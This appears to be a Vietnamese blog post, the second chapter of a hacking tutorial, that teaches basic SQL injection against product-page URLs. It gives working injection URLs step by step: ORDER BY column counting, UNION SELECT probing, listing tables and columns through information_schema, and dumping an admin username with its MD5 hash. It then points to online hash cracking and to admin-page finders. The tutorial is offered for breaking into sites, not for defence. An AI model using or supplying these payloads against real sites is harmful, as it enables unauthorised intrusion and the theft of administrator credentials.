Thứ Tư, 7 tháng 6, 2017

[Chap 2] Khai thác SQLi lỗi dạng cơ bản

Đối với dạng cơ bản thì ta sẽ khai thác đối với các link site kết thúc có dạng:

id=
category=
decl_id=
num=
sanpham=
product=

và còn một số kiểu khác na ná như trên

ví dụ ta có một site:  http://www.domain.com/?frame=product_detail&id=2598
và giao diện của nó như sau



Bước 1: Check lỗi:

Để biết site có dính lỗi hay không ta thêm dấu  '  vào sau 2598

http://www.domain.com/?frame=product_detail&id=2598'

Nếu giao diện của site thay đổi tức là site đã bị lỗi sqli



Bước 2: Tìm số trường cột
http://www.domain.com/?frame=product_detail&id=2598 order by 1-- -      site bình thường
http://www.domain.com/?frame=product_detail&id=2598 order by 15-- -     Site vẫn bình thường
http://www.domain.com/?frame=product_detail&id=2598 order by 16-- -      Giao diện website thay đổi.

=>   Số trường  cột cần tìm là 15

Bước 3: Xác định vị trí trường cột bị lỗi


http://www.domain.com/?frame=product_detail&id=-2598 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -


Chú ý là phải có dấu - trước 2598 thì mới xuất hiện ra các con số đẹp.

ví dụ sau khi chạy querry trên chúng ta thấy xuất hiện các con số: 2,3,6,15,7. Đó chính là những vị trí bị lỗi mà chúng ta có thể khai thác tại đó. Ta sẽ khai thác tại vị trí thứ 2.

Bước 4: Xuất ra tên các tables trong database

http://www.domain.com/?frame=product_detail&id=-2598 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()-- -

Thông tin về tên các table thu được:

tbl_config,tbl_content,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_product_category,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor 

Table chứa thông tin về username và password là tbl_user. ( Thường là nhưng table có chữ user).  Vì vậy ta sẽ khai thác ở table này.

Bước 5: Xuất ra tên các colums chứa username và password


http://www.domain.com/?frame=product_detail&id=-2598 UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_schema=database() and table_name=0x74626c5f75736572-- -

     Lưu ý:   
-          0x tạm hiểu là dung để nhận dạng khi sử dụng ở dạng mã hex
-          74626c5f75736572 là chữ tbl_user ở dạng hex.
-          Link convert các ký tự sang mã hex:

Thông tin về tên columns thu được:

id,uid,pwd         
                
Bước 6: Xuất ra thông tin về Username và Password

http://www.domain.com/?frame=product_detail&id=-2598 UNION SELECT 1,unhex(hex(group_concat(uid,0x2f,pwd))),3,4,5,6,7,8,9,10,11,12,13,14,15 from tbl_user-- -


Thông tin về username và password được mã hóa md5 thu được:

admin/679115597bf9f763506dcc9a8e9e8e82          

Bước 7:  Crack Password và tìm link admin:

-  Có nhiều site để crack passwd, ví dụ:  http://md5cracker.org/

Hoặc sử dụng google để tìm kiếm

- Để tìm link admin các bạn có thể dùng phần mềm :  

Pass unrar:  quylevhb

Không có nhận xét nào:

Đăng nhận xét